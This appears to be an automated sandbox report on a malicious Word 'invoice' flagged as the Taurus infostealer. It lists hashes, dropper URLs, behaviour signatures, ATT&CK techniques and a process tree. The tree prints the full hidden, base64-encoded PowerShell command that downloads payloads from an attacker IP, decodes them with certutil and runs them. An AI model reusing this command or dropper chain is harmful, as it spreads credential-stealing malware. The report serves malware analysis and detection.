taurus_stealer | eef4b50a6a9a4371bc70b9b79d033053f0419c8c216118a6b5046117e4d6e272

General

Target

msoffice_invoice1764727.doc
Size

97KB
MD5

5d38f68c18e3d9557523b25ad3fe4a86
SHA1

a2c736b4bb06131dbb828c79711a1c7ec729d501
SHA256

eef4b50a6a9a4371bc70b9b79d033053f0419c8c216118a6b5046117e4d6e272
SHA512

4a6dcba8e2563f09dda60ac52dcda7f93e699f254a745d04ebbec57564e37371470e9d41473c2e33ad11256dea9f7a811810aeab1263a203048058c83a3f73f9

Score

10^/10

taurus_stealer stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.189.12.182/RLCOrLHeK.com

exe.dropper

http://185.189.12.182/FfvEZtUVUkHjw.com

exe.dropper

http://185.189.12.182/GUavFcvTh.com

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	800	powershell.exe	24

Taurus Stealer
Taurus is an infostealer first seen in June 2020.
trojan stealer taurus_stealer

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1968 set thread context of 1984	1968	vtgiw.com	32

Office loads VBA resources, possible macro or embedded object present

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1736	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1984	ipconfig.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1452	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
316	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1968	vtgiw.com

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1932	vtgiw.com
1932	vtgiw.com
1932	vtgiw.com
1968	vtgiw.com
1968	vtgiw.com
1968	vtgiw.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1932	vtgiw.com
1932	vtgiw.com
1932	vtgiw.com
1968	vtgiw.com
1968	vtgiw.com
1968	vtgiw.com

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1452	WINWORD.EXE
1452	WINWORD.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 316 wrote to memory of 1644	316	powershell.exe	29
PID 316 wrote to memory of 1644	316	powershell.exe	29
PID 316 wrote to memory of 1644	316	powershell.exe	29
PID 316 wrote to memory of 1932	316	powershell.exe	30
PID 316 wrote to memory of 1932	316	powershell.exe	30
PID 316 wrote to memory of 1932	316	powershell.exe	30
PID 316 wrote to memory of 1932	316	powershell.exe	30
PID 1932 wrote to memory of 1968	1932	vtgiw.com	31
PID 1932 wrote to memory of 1968	1932	vtgiw.com	31
PID 1932 wrote to memory of 1968	1932	vtgiw.com	31
PID 1932 wrote to memory of 1968	1932	vtgiw.com	31
PID 1968 wrote to memory of 1984	1968	vtgiw.com	32
PID 1968 wrote to memory of 1984	1968	vtgiw.com	32
PID 1968 wrote to memory of 1984	1968	vtgiw.com	32
PID 1968 wrote to memory of 1984	1968	vtgiw.com	32
PID 1968 wrote to memory of 1984	1968	vtgiw.com	32
PID 1984 wrote to memory of 348	1984	ipconfig.exe	36
PID 1984 wrote to memory of 348	1984	ipconfig.exe	36
PID 1984 wrote to memory of 348	1984	ipconfig.exe	36
PID 1984 wrote to memory of 348	1984	ipconfig.exe	36
PID 348 wrote to memory of 1736	348	cmd.exe	38
PID 348 wrote to memory of 1736	348	cmd.exe	38
PID 348 wrote to memory of 1736	348	cmd.exe	38
PID 348 wrote to memory of 1736	348	cmd.exe	38

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\msoffice_invoice1764727.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA4ADkALgAxADIALgAxADgAMgAvAFIATABDAE8AcgBMAEgAZQBLAC4AYwBvAG0ALABoAHQAdABwADoALwAvADEAOAA1AC4AMQA4ADkALgAxADIALgAxADgAMgAvAEYAZgB2AEUAWgB0AFUAVgBVAGsASABqAHcALgBjAG8AbQAsAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADgAOQAuADEAMgAuADEAOAAyAC8ARwBVAGEAdgBGAGMAdgBUAGgALgBjAG8AbQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAHYAdABnAGkAdwAuAGMAbwBtACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdgAxAG0AZABrACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwARwBVAGEAdgBGAGMAdgBUAGgALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHYAMQBtAGQAawAgADUAMQAzAGsAaQA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdgB0AGcAaQB3ACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgADUAMQAzAGsAaQA=
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316
- C:\Windows\system32\certutil.exe
  "C:\Windows\system32\certutil.exe" -decode v1mdk 513ki
  2⤵
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\vtgiw.com
  "C:\Users\Admin\AppData\Local\Temp\vtgiw.com" 513ki
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Users\Admin\AppData\Local\Temp\vtgiw.com
    C:\Users\Admin\AppData\Local\Temp\vtgiw.com 513ki
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\SysWOW64\ipconfig.exe"
      4⤵
      Gathers network information
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Windows\SysWOW64\ipconfig.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:348
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        6⤵
        Delays execution with timeout.exe
        
        PID:1736

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1984-6-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1984-8-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads